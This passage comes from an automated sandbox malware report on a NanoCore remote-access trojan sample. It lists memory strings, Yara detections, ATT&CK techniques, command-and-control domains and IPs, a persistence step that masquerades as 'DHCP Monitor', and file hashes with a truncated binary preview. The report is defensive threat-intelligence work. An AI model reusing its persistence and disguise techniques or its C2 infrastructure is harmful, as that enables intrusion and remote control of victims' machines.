untime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe, 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection312	Masquerading2	Input Capture11	Security Software Discovery1	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection312	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing11	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Timestomp1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LFEs2N6DU4.exe	12%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack	100%	Avira	HEUR/AGEN.1131827	Download File
13.2.LFEs2N6DU4.exe.5650000.9.unpack	100%	Avira	TR/NanoCore.fadte	Download File
24.2.LFEs2N6DU4.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
26.2.dhcpmon.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
25.2.dhcpmon.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.2.LFEs2N6DU4.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
cloudhost.myfirewall.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cloudhost.myfirewall.org	91.121.250.249	true	true		unknown
store2.gofile.io	31.14.69.10	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cloudhost.myfirewall.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://store2.gofile.io	LFEs2N6DU4.exe, 00000001.00000002.309201584.00000000023F1000.00000004.00000001.sdmp, LFEs2N6DU4.exe, 00000014.00000002.375508476.0000000003081000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000002.388203081.0000000002741000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000002.397498725.0000000002AF1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LFEs2N6DU4.exe, 00000001.00000002.309201584.00000000023F1000.00000004.00000001.sdmp, LFEs2N6DU4.exe, 00000014.00000002.375508476.0000000003081000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000002.388203081.0000000002741000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000002.397498725.0000000002AF1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.121.250.249	cloudhost.myfirewall.org	France		16276	OVHFR	true
31.14.69.10	store2.gofile.io	Virgin Islands (BRITISH)		199483	LINKER-ASFR	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502379
Start date:	13.10.2021
Start time:	21:01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LFEs2N6DU4.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@18/12@26/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 71.5% Quality standard deviation: 13.5%
HCA Information:	Successful, ratio: 93% Number of executed functions: 142 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 95.100.216.89, 20.50.102.62, 67.26.75.254, 67.27.157.126, 8.248.113.254, 67.26.81.254, 67.27.158.254, 20.54.110.249, 52.251.79.25, 40.112.88.60, 2.20.178.24, 2.20.178.33 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:02:27	API Interceptor	800x Sleep call for process: LFEs2N6DU4.exe modified
21:02:32	Task Scheduler	Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe" s>$(Arg0)
21:02:33	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
21:02:35	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
21:03:03	API Interceptor	2x Sleep call for process: dhcpmon.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
91.121.250.249	gFPbTs1YDm.exe	Get hash	malicious	Browse
	FYrMKmDjFi.exe	Get hash	malicious	Browse
	img_Especificaci#U00f3n_07102021.doc	Get hash	malicious	Browse
	RF Oferta_07102021.doc	Get hash	malicious	Browse
	PC3aLumBwk.exe	Get hash	malicious	Browse
	nEwkr1dC74.exe	Get hash	malicious	Browse
	ns3uyMDRlK.exe	Get hash	malicious	Browse
	h7zYqHS8sH.exe	Get hash	malicious	Browse
	kXm6HMMRfu.exe	Get hash	malicious	Browse
	especificaci#U00f3n 0021.doc	Get hash	malicious	Browse
	RF Quotation_04102021.doc	Get hash	malicious	Browse
	NuKV3QA0Ju.exe	Get hash	malicious	Browse
	kbfUrCTi7x.exe	Get hash	malicious	Browse
	IMG_PO-000120741.doc	Get hash	malicious	Browse
	Inq PO-000202120741.doc	Get hash	malicious	Browse
	O3HrQCLthu.exe	Get hash	malicious	Browse
	IMG_MT102_Swift 20210930.doc	Get hash	malicious	Browse
	Payment_Swift 20210930.doc	Get hash	malicious	Browse
	b0Ccd4hQb9.exe	Get hash	malicious	Browse
	EXCEL.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cloudhost.myfirewall.org	FYrMKmDjFi.exe	Get hash	malicious	Browse	91.121.250.249
	img_Especificaci#U00f3n_07102021.doc	Get hash	malicious	Browse	91.121.250.249
	nEwkr1dC74.exe	Get hash	malicious	Browse	91.121.250.249
	kXm6HMMRfu.exe	Get hash	malicious	Browse	91.121.250.249
	especificaci#U00f3n 0021.doc	Get hash	malicious	Browse	91.121.250.249
	NuKV3QA0Ju.exe	Get hash	malicious	Browse	91.121.250.249
	O3HrQCLthu.exe	Get hash	malicious	Browse	91.121.250.249
	IMG_MT102_Swift 20210930.doc	Get hash	malicious	Browse	91.121.250.249
	b0Ccd4hQb9.exe	Get hash	malicious	Browse	91.121.250.249
	Kr6cPPASEZ.exe	Get hash	malicious	Browse	91.121.250.249
	R1K5dU1K9o.exe	Get hash	malicious	Browse	146.59.132.186
	OHlT14GyKR.exe	Get hash	malicious	Browse	146.59.132.186
	IMG_Order SPECIFICATION 094765 img.doc	Get hash	malicious	Browse	146.59.132.186
	Shipping Document AWB FedEx #980053378119pdf..exe	Get hash	malicious	Browse	45.133.1.67
	Payment Swift Copy20210525pdf.exe	Get hash	malicious	Browse	45.133.1.67
	uQbZZ4mUTm.jar	Get hash	malicious	Browse	31.210.21.205
	cd61fe0ebfe9f6326cd5a4df9747e72c.exe	Get hash	malicious	Browse	45.154.4.64
	PyQdnx9PHg.exe	Get hash	malicious	Browse	31.210.21.252
	GO1eovBADG.exe	Get hash	malicious	Browse	45.85.90.92
	9nNELqsesC.exe	Get hash	malicious	Browse	46.183.220.67

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	bdxloc.dll	Get hash	malicious	Browse	51.83.3.52
	Original Shipment Doc Ref 2853801324189923,PDF.exe	Get hash	malicious	Browse	213.186.33.5
	56460021473877.exe	Get hash	malicious	Browse	213.186.33.5
	SecuriteInfo.com.Exploit.Siggen3.21227.11912.xls	Get hash	malicious	Browse	188.165.62.61
	SecuriteInfo.com.Exploit.Siggen3.21227.11912.xls	Get hash	malicious	Browse	188.165.62.61
	yHm66D4wla.dll	Get hash	malicious	Browse	51.83.3.52
	FIDTIpakSU.dll	Get hash	malicious	Browse	51.83.3.52
	BobglLrEyi.dll	Get hash	malicious	Browse	51.83.3.52
	Pxnrz0DXD3.dll	Get hash	malicious	Browse	51.83.3.52
	ZHuOtLRXeM.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Artemis9D180B40D96E.25394.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.12255.xls	Get hash	malicious	Browse	188.165.62.61
	SecuriteInfo.com.ML.PE-A.4403.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.ML.PE-A.28995.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.ML.PE-A.4995.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.17985.xls	Get hash	malicious	Browse	188.165.62.61
	qDXRTsZAL9.exe	Get hash	malicious	Browse	139.99.118.252
	SecuriteInfo.com.Heur.12255.xls	Get hash	malicious	Browse	188.165.62.61
	h9WnY2tOg7.dll	Get hash	malicious	Browse	51.83.3.52
	SecuriteInfo.com.Heur.17985.xls	Get hash	malicious	Browse	188.165.62.61
LINKER-ASFR	6J3qzZz5pS.exe	Get hash	malicious	Browse	31.14.69.10
	WU PAYMENT DETAILS.doc	Get hash	malicious	Browse	31.14.69.10
	Qoutation013-10.exe	Get hash	malicious	Browse	31.14.69.10
	Gkd7ep9tKS.exe	Get hash	malicious	Browse	31.14.69.10
	hKzrJKI9CR.exe	Get hash	malicious	Browse	31.14.69.10
	Request For New Qoute - Ist Order.exe	Get hash	malicious	Browse	31.14.69.10
	Invoice- 0535254 Oil_Field_4568742.doc	Get hash	malicious	Browse	31.14.69.10
	MT103-Advance.Payment.exe	Get hash	malicious	Browse	31.14.69.10
	Payment009731743,pdf.exe	Get hash	malicious	Browse	31.14.69.10
	IMG-XEROX.exe	Get hash	malicious	Browse	31.14.69.10
	office.exe	Get hash	malicious	Browse	31.14.69.10
	PCS TENDER PROFILE-20210920.exe	Get hash	malicious	Browse	31.14.69.10
	New Order Inquiry No.96883,pdf.exe	Get hash	malicious	Browse	31.14.69.10
	PCS TENDER PROFILE-20210920.exe	Get hash	malicious	Browse	31.14.69.10
	TxEjwXD8eb.exe	Get hash	malicious	Browse	31.14.69.10
	DHL-3009216769976535455627775648896.exe	Get hash	malicious	Browse	31.14.69.10
	gFPbTs1YDm.exe	Get hash	malicious	Browse	31.14.69.10
	FYrMKmDjFi.exe	Get hash	malicious	Browse	31.14.69.10
	5wxqk9Wjnb.exe	Get hash	malicious	Browse	31.14.69.10
	AUdWjscHY2.exe	Get hash	malicious	Browse	31.14.69.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.713207310454996
Encrypted:	false
SSDEEP:	192:RylWethV1SLBdCYpy/zFkKt7QqMT0U2/JT0JN7Kae6b4vT:RYWetP1SLuhk6snT0UUKN7Kj
MD5:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
SHA1:	112314D871226E07180BF2D0A2852120CBC1399F
SHA-256:	799A0831A87F80DDCED683CF26C082C58C936A1BB868DD0E97552A9F035BA4EE
SHA-512:	319AA0970867EC79FB9C6B5F90D8D276EAB4E59A7DFD6DEAB30C15F90651B80EA409C57F0FDC8E0E23EEAC0621AF0312CB0A4206F80E2F5E22D63B48AB7DDC57
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.................0..............5... ...@....@.. ....................................@..................................4..O....@..d....................`.......4............................................... ............... ..H............text... .... ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................4......H.......@#...............3...............................................r...p(......-.(....(....r...p(........0..W.......s......o....+..o.......(....(......(.....o.......(....#......3@2..o.... ....(......&.........G..S.......0..M.......(....(....o.......+2.....o ...,"..(!...,..o"...r...p(#...,..(....&..X....i2.....0..4.......ri..p($...r...p ............%.(....(.....o%...t.....0.."........r...p .......o%....&......&......................Bs&...r...p('.......0..........

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LFEs2N6DU4.exe.log Download File
Process:	C:\Users\user\Desktop\LFEs2N6DU4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
